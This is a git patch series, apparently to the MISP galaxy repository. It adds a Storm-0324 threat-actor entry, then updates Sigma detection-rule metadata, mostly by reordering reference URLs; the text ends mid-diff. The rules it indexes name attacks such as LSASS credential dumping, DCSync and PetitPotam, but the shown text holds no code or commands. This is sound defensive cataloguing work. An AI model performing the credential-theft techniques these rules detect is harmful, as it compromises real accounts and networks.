From e2fd0058214d3a3482cdb996933d2e1ce0897e61 Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Fri, 15 Sep 2023 16:29:45 +0200 Subject: [PATCH 01/16] [threat-actors] Add Storm-0324 --- clusters/threat-actor.json | 27 ++++++++++++++++++++++++++- 1 file changed, 26 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 804d33e..09779d6 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -11646,7 +11646,32 @@ }, "uuid": "01ac8b25-492e-444b-891b-968f2694e7b2", "value": "MoustachedBouncer" + }, + { + "description": "The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.", + "meta": { + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/", + "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded" + ], + "synonyms": [ + "DEV-0324", + "Sagrid", + "TA543" + ] + }, + "related": [ + { + "dest-uuid": "5db89188-568d-40d2-9320-5fb4a06fbd51", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "uses" + } + ], + "uuid": "8cb6f57b-9ebb-45a6-a89f-9efdb8065d70", + "value": "Storm-0324" } ], - "version": 281 + "version": 282 } From 5437fac633ab3c689155a0dd87896b1823cda9f9 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 24 Sep 2023 12:05:54 +0200 Subject: [PATCH 02/16] chg: [sigma] updated --- clusters/sigma-rules.json | 6838 +++++++++++++++++++++++++++---------- 1 file changed, 4956 insertions(+), 1882 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index 1a3589b..569e648 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -76,9 +76,9 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": "No established tags" @@ -134,10 +134,10 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://core.telegram.org/bots/faq", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ @@ -246,8 +246,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ @@ -1209,10 +1209,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -1590,8 +1590,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/Maka8ka/NGLite", "https://github.com/nknorg/nkn-sdk-go", + "https://github.com/Maka8ka/NGLite", "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], @@ -1726,12 +1726,12 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://github.com/corelight/CVE-2021-1675", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/corelight/CVE-2021-1675", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ @@ -1863,10 +1863,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://twitter.com/neu5ron/status/1346245602502443009", - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ @@ -1907,8 +1907,8 @@ "logsource.category": "application", "logsource.product": "django", "refs": [ - "https://docs.djangoproject.com/en/1.11/ref/exceptions/", "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" ], "tags": [ @@ -2007,8 +2007,8 @@ "logsource.category": "application", "logsource.product": "spring", "refs": [ - "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection", + "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_spel_injection.yml" ], "tags": [ @@ -2175,9 +2175,9 @@ "logsource.category": "application", "logsource.product": "jvm", "refs": [ + "https://rules.sonarsource.com/java/RSPEC-2755", "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", - "https://rules.sonarsource.com/java/RSPEC-2755", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml" ], "tags": [ @@ -2277,10 +2277,10 @@ "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ + "http://edgeguides.rubyonrails.org/security.html", "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", - "http://edgeguides.rubyonrails.org/security.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -2313,10 +2313,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", - "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ @@ -2349,10 +2349,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ @@ -2375,10 +2375,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" ], "tags": [ @@ -2401,10 +2401,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], "tags": [ @@ -2437,10 +2437,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" ], "tags": [ @@ -2481,10 +2481,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ @@ -2541,10 +2541,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" ], "tags": [ @@ -2585,8 +2585,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], @@ -2628,10 +2628,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" ], "tags": [ @@ -2672,12 +2672,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -2700,9 +2700,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], @@ -2735,10 +2735,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ @@ -2761,10 +2761,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" ], "tags": [ @@ -2787,10 +2787,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ @@ -2823,9 +2823,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], @@ -2849,10 +2849,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], "tags": [ @@ -2943,11 +2943,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], "tags": [ @@ -2981,8 +2981,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ @@ -3128,8 +3128,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/hlldz/Invoke-Phant0m", "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/hlldz/Invoke-Phant0m", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ @@ -3418,9 +3418,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], @@ -3456,9 +3456,9 @@ "logsource.product": "windows", "refs": [ "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" ], "tags": [ @@ -3493,11 +3493,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], "tags": [ @@ -3531,11 +3531,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], "tags": [ @@ -3787,8 +3787,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://github.com/codewhitesec/SysmonEnte/", + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" ], @@ -3822,8 +3822,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/boku7/injectAmsiBypass", "https://github.com/boku7/spawn", + "https://github.com/boku7/injectAmsiBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" ], "tags": [ @@ -3865,9 +3865,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://twitter.com/SBousseaden/status/1541920424635912196", - "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", 